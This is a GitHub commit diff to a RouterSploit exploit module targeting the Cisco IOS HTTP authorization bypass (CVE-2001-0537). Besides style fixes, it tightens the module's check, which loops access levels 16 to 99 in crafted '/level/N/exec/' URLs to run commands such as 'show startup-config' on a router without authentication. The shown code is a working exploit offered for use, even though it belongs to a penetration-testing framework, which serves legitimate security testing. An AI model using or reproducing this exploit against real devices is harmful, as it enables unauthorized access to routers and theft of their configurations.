Corrected logic errors

Corrected logic errors and PEP 8

Corrected logic errors
Corrected logic errors and PEP 8
66b8c455 · Renos Stoikos · GitHub · a28aa3b3 · 66b8c455
Commit 66b8c455 authored 8 years ago by Renos Stoikos Committed by GitHub 8 years ago
Show whitespace changes
Inline Side-by-side

Showing with 6 additions and 6 deletions

cisco_ios_http_authorization_bypass.py ...les/exploits/cisco/cisco_ios_http_authorization_bypass.py +6 -6

No files found.
--- a/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
+++ b/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
                       'to bypass authentication and execute arbitrary commands, '
                       'when local authorization is being used, by specifying a high access level in the URL.',
        'authors': [
-            'Author', 'renos stoikos <rstoikos[at]gmail.com>'  #routesploit module
+            'Author', 'renos stoikos <rstoikos[at]gmail.com>'  # routesploit module
        ],
        'references': [
            'http://www.cvedetails.com/cve/cve-2001-0537',
@@ -34,8 +34,8 @@ class Exploit(exploits.Exploit):
        ],
    }
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  #target address
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
-    port = exploits.Option(80, 'Target port')  #default port
+    port = exploits.Option(80, 'Target port')  # default port
    show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
    access_level = None
@@ -44,7 +44,7 @@ class Exploit(exploits.Exploit):
        for num in range(16, 100):
            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
            response = http_request(method="GET", url=url)
-            if response.status_code == 200:
+            if response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
                self.access_level = num
                return True  # target is vulnerable
        return False  # target is not vulnerable
@@ -57,8 +57,8 @@ class Exploit(exploits.Exploit):
            if response is None:
                print_error("Could not execute command")  # target is not vulnerable
                return
-            elif response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
+            else:
                print_success("Exploit success! - executing command")
-                print re.sub('<[^<]+?>', '', response.text)
+                print_info(re.sub('<[^<]+?>', '', response.text))
        else:
            print_error("Exploit failed - target seems to be not vulnerable")